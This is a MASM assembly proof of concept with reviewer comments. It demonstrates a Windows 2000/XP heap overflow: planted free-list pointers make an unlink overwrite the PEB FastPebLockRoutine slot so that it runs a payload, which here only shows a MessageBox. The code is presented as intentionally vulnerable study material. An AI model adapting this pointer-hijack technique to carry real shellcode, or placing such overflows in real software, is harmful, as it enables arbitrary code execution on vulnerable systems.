.386
.model flat, stdcall ;32 bit memory model
option casemap :none ;case sensitive
include heapoverflow.inc
.data
heap dd ?   ; handle of the private heap created in start: (HeapCreate, HEAP_NO_SERIALIZE)
h1 dd ?     ; first allocation (016h bytes requested); start: writes at h1+32 and h1+36, i.e. past that size
h2 dd ?     ; second allocation (0120h bytes); the allocation meant to trigger the corrupted free-list unlink
myaddr dd ? ; saved original value of the PEB+020h slot (per the author: the normal ntdll.RtlEnterCriticalSection address); myShellcode writes it back
.code
;-----------------------------------------------------------------------
; myShellcode - payload whose address start: plants in the heap so that,
; after the corrupted free-list unlink, the PEB+020h slot points here.
; NOTE(review): `proc?` is not a MASM directive - presumably a
; transcription artifact of `proc`; confirm that this actually assembles.
; What it does when reached:
;   - fs:[030h] is the PEB pointer in the 32-bit TEB; PEB+020h is the slot
;     whose original value start: saved into myaddr (per the author, the
;     normal ntdll.RtlEnterCriticalSection address).
;   - Writes that saved value back, undoing the hijack - presumably so
;     later calls through the slot land in ntdll again instead of here.
;   - Shows an empty MessageBox as the visible proof of execution, then
;     returns with a plain `ret`.
; Caveats: ebx is clobbered and no arguments are cleaned up, so whatever
; called through the hijacked pointer gets back a mismatched stack and
; registers - acceptable for a PoC that only needs to pop a box.
; NOTE(review): PEB+020h matches the FastPebLockRoutine slot of the
; Windows 2000/XP PEB; it does not exist on later versions, so this PoC
; is OS-version specific - confirm the target.  If the unlink also does
; the mirror write (Flink->Blink = Blink), that lands at myShellcode+4,
; inside these instructions; whether it faults or patches the code
; depends on the code section's protection - check in a debugger.
;-----------------------------------------------------------------------
myShellcode proc?
assume fs:nothing             ; let MASM accept fs: segment overrides
mov eax,fs:[030h]             ; eax = PEB
add eax,020h                  ; eax = address of the PEB+020h slot
mov ebx,myaddr                ; original pointer saved by start:
mov [eax],ebx                 ; restore the normal pointer here
invoke MessageBox,0,0,0,MB_OK ; visible proof that the payload ran
ret
myShellcode endp
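;-----------------------------------------------------------------------
; start - entry point: heap-overflow proof of concept.
;
; Sequence (single thread, private non-serialised heap):
;   1. Create a growable private heap and carve a 016h-byte block (h1).
;   2. Write two dwords at h1+32 / h1+36 - beyond the 016h bytes that were
;      requested: the address of myShellcode, then the address of the
;      PEB+020h slot.  The slot's current value is saved in myaddr first
;      so myShellcode can put it back.
;   3. Allocate again (0120h bytes).  The intent (see myShellcode, which
;      restores PEB+020h) is that the heap's free-list unlink dereferences
;      the two planted dwords and ends up storing &myShellcode in PEB+020h.
;   4. ExitProcess.
;
; NOTE(review): this depends on the pre-safe-unlinking Windows heap and on
; PEB+020h being a callable routine pointer (the Windows 2000/XP
; FastPebLockRoutine).  XP SP2 and later validate free-list links and no
; longer keep that pointer, so the PoC is specific to those older systems;
; confirm the target in a debugger.  It is intentionally vulnerable study
; code, not something to ship.
; Register use: eax/ebx/edi are scratch; nothing is preserved because the
; process exits from here and never returns to a caller.
; The allocation failure checks and the removal of the unreachable dialog
; template code after ExitProcess are the only changes to the original.
;-----------------------------------------------------------------------
TEB_PEB_PTR      equ 030h       ; fs:[030h] = PEB pointer in the 32-bit TEB
PEB_SLOT_OFF     equ 020h       ; PEB+020h: slot saved in myaddr (per the author, ntdll.RtlEnterCriticalSection)
OVERWRITE_OFF    equ 32         ; h1+32: first dword written past the 016h-byte block
                                ; NOTE(review): presumably 018h (016h rounded up) + the 8-byte header of the
                                ; adjacent free block, i.e. its Flink; h1+36 would then be its Blink - verify
                                ; against the actual heap layout in a debugger.

start:
    invoke  HeapCreate,HEAP_NO_SERIALIZE,01000h,0     ; private heap, no lock, growable
    mov     heap,eax
    test    eax,eax
    jz      alloc_failed                              ; NULL handle: nothing to demonstrate
    invoke  HeapAlloc,heap,HEAP_NO_SERIALIZE,016h     ; h1: the block that gets written past
    mov     h1,eax
    test    eax,eax
    jz      alloc_failed
    mov     edi,eax
    add     edi,OVERWRITE_OFF
    mov     dword ptr [edi],offset myShellcode        ; h1+32 <- &myShellcode
    ;int 3                                            ; uncomment to break into the debugger before the trigger
    add     edi,4                                     ; h1+36: the second planted dword
    assume  fs:nothing                                ; let MASM accept fs: segment overrides
    mov     eax,fs:[TEB_PEB_PTR]                      ; eax = PEB
    add     eax,PEB_SLOT_OFF                          ; eax = address of the PEB+020h slot
    mov     ebx,[eax]                                 ; ebx = its current value (the normal pointer)
    mov     myaddr,ebx                                ; keep it so myShellcode can restore it
    mov     [edi],eax                                 ; h1+36 <- address of the PEB+020h slot
    invoke  HeapAlloc,heap,HEAP_NO_SERIALIZE,0120h    ; trigger: meant to consume the adjacent free block
    mov     h2,eax
    invoke  ExitProcess,0

alloc_failed:
    invoke  ExitProcess,1                             ; heap creation/allocation failed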
;########################################################################
;-----------------------------------------------------------------------
; DlgProc - dialog procedure left over from the MASM dialog template.
; start: exits the process before any dialog is created, so the PoC never
; reaches it; it is kept so the file still assembles as written.
; In:  hWnd, uMsg, wParam, lParam (standard DLGPROC, stdcall; MASM emits
;      the 16-byte stack cleanup on ret)
; Out: eax = TRUE for WM_INITDIALOG, WM_COMMAND and WM_CLOSE (WM_CLOSE
;      also ends the dialog with result 0); FALSE for any other message.
;-----------------------------------------------------------------------
DlgProc proc hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
    mov     eax,uMsg
    cmp     eax,WM_INITDIALOG
    je      dlg_handled             ; nothing to initialise; just claim the message
    cmp     eax,WM_COMMAND
    je      dlg_handled             ; no controls are wired up
    cmp     eax,WM_CLOSE
    jne     dlg_not_handled
    invoke  EndDialog,hWnd,0        ; close the dialog with result 0
dlg_handled:
    mov     eax,TRUE
    ret
dlg_not_handled:
    xor     eax,eax                 ; FALSE: let the default dialog handler run
    ret
DlgProc endp
end start